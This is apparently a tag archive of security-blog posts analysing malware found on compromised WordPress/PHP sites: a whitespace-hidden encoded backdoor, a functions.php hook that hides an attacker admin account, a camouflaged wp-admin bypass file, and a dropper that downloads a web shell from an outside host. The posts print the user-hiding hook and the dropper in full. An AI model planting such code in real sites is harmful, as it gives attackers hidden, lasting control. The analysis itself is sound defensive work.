Tag: Obfuscation

Hiding malicious code from the user using white...

Over the years, attackers have used different techniques for hiding malicious files on websites. They obfuscated code, changed legit functions to execute malware, modified whole core files to execute their malicious activity and much more.


In this article, we’ll describe a simple way of hiding malware from non-experienced webmasters that are using text editors which do not wrap long lines of code. Instead of injecting complex and obfuscated code, attackers simply added white spaces in the beginning of the file. The snippet in question follows (please notice the scroll bar at the bottom):

At first glance, the file looked pretty normal. Upon further inspection, we noticed that there was a code shifted within 598 whitespace characters on the first row containing the following content:

<p

$x8 = "x63x68x72"; $E7 = "x69x6ex74x76x61x6c"; $Qb = $x8($E7("x31x30x31")).$x8($E7($x8($E7("x3….

In this particular case, the attacker hid a heavily-encoded PHP backdoor into the file. There are different attacks using this very same technique, such as, SEO Spam Injections, Credential & Credit Card Stealers, and others.

If you suspect any malware activity on your website and at first glance you cannot find anything suspicious, we recommend checking for modified files. If you are not comfortable to modify files and the database yourself,  you can rely on the Security Engineers at https://sucuri.net to clean and protect your website.

Feb 14, 2017 by Yuliyan Tsvetkov

Hooking WordPress Class to Hide Malicious Users

When a website is compromised, attackers perform post-exploitation tasks to  maintain  access to the site for as long as possible. One of these actions is usually the creation of admin users to remotely control the site or automate the creation or distribution of spam content. Unfortunately (for them), it’s really easy to detect and remove these fake users and they have to find and execute new techniques to actually hide them. During an investigation, we found a small piece of code inside the file "/current_wp_theme/functions.php" that caught our attention:


<?phpadd_action('pre_user_query','yoursite_pre_user_query');function yoursite_pre_user_query($user_search) {  global $current_user;  $username = $current_user->user_login;
  if ($username != 'admina') {     global $wpdb;    $user_search->query_where = str_replace('WHERE 1=1',      "WHERE 1=1 AND {$wpdb->users}.user_login != 'admina'",$user_search->query_where);  }}

Basically this code is being used as a Hook for the action “pre_user_query”. According to the official documentation,  this action "Fires after the WP_User_Query has been parsed, and before the query is executed" which allows us to actually modify the query of the WordPress core class “WP_User_Query”  on the fly.

In this case, the attacker is using the function  "str_replace()" to replace the original "user_search query"with one of his own, therefore making the malicious admin user "admina" invisible on the WordPress admin area (backend):

WHERE 1=1',      "WHERE 1=1 AND {$wpdb->users}.user_login != 'admina'",$user_search->query_where

If you see malicious posts on your site with an unknown author and you are not able to find the user to remove it, your site may be infected with a similar code. Also, If you have a File Integrity Monitoring system in place, you should be able to detect such changes to the File System and take the appropriate actions to prevent / remediate the infection (remove / re-upload).

Jan 20, 2017 by John Castro

Camouflage does not have to be advanced to...

Often times a malware author will try to provide some type of camouflage to their malware’s coding in an effort to disguise an unsuspecting eye from its true intentions. I recently came across an interesting example from a malicious file used to bypass authentication when accessing wp-admin:


If you aren’t familiar with the word “Softaculous”, it is a popular installer for common CMS and other scripts. If you have ever used a “one click install” tool like Fantastico de Luxe or QuickInstall/Mojo Marketplace, then it is similar to that.

I also want to mention that the filename was a random alphanumeric string, so it wasn’t possible to determine the legitimacy through the filename alone. For that reason, we needed to analyze the coding and make our determination through there.

An unsuspecting person may view line 4 and see that it mentions Softaculous. If they used Softaculous before, they may just take a quick glance at the rest of the file. Since Softaculous allows for automatic updates, and users update WordPress through wp-admin,  doesn’t it seem reasonable that Softaculous may need to access wp-admin for updates and that’s the purpose of this file?

This is a great example of how the camouflage attempts to trick the user into thinking this is, or might be, just a normal file. Due to this doubt, some users won’t delete the file, leaving it intact (as I am sure many of us have accidentally deleted an important file and know how destructive that can be, especially if you don’t have any backups).

Ultimately the file was not legitimate and was determined to have been maliciously added. It’s what I would call a multi-layer backdoor, as the hacker could also create their own admin user once inside wp-admin so they wouldn’t have to rely on the file being there in the future (though a professional or security-experienced user should know to examine existing users).

If you need any help or have any questions, let us know. 🙂

Jan 12, 2017 by Luke Leal

Web shell downloader – simple attempt to avoid...

When dealing with compromised scenarios, our team has to be very thorough to remove all pieces of malware in the infected website. Most of the time attackers don’t inject single bits of code but a variety of malware to increase the chances of maintaining access to the compromised resource while reducing the chances of getting caught.


One of the techniques they use to increase those odds, is injecting a file known as Dropper that downloads the real malware into the system. The Dropper could go undetected for a long time because it usually doesn’t have any obfuscated function, encoding, or anything that is malicious per se. Its sole purpose is to download and write the malware into the system as you can see in the snippet below:  

<?php
if( $z = fopen( 'include4.php', 'w') ) {
 if( fwrite( $z, file_get_contents( 'hxxp://picasa(dot)commie.msgftw(dot)com/priv8.php') ) ) {
 fclose( $z );
 echo '0';
 } else {
 echo '1';
 }
} else {
 echo '2';
}

If you are unfamiliar with PHP, don’t you worry, the snippet is pretty straightforward. The Dropper tries to download the malware (webshell) using the function “file_get_contents()” and saves it into the file “include4.php”. If the operation succeeds, the number 0 is printed as a result of the request. - the well known exit code in UNIX systems for successful execution of command. If the operation can’t download the webshell, it prints 1; if it can’t create the file in which the shell will resides  it prints 2.  

The following code is the content of the webshell fetched from the 'hxxttp://picasa(dot)commie.msgftw(dot)com/priv8.php' link by the Dropper:

<?php
/*
::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:: ::
:: bm.php ::
:: BoffMax v1.0 Web Shell by The-C0de Team ::
....
<? eval(gzinflate(str_rot13(base64_decode('FJ3HjuPaklJ/
...

To protect and prevent these issues from happening, we highly recommend having a File Integrity Monitoring system in place, as well as adding a Web Application Firewall to block attacks against your website. If you suspect you are infected, or detect suspicious activities on your website, feel free to contact us at: https://sucuri.net

Dec 29, 2016 by Yuliyan Tsvetkov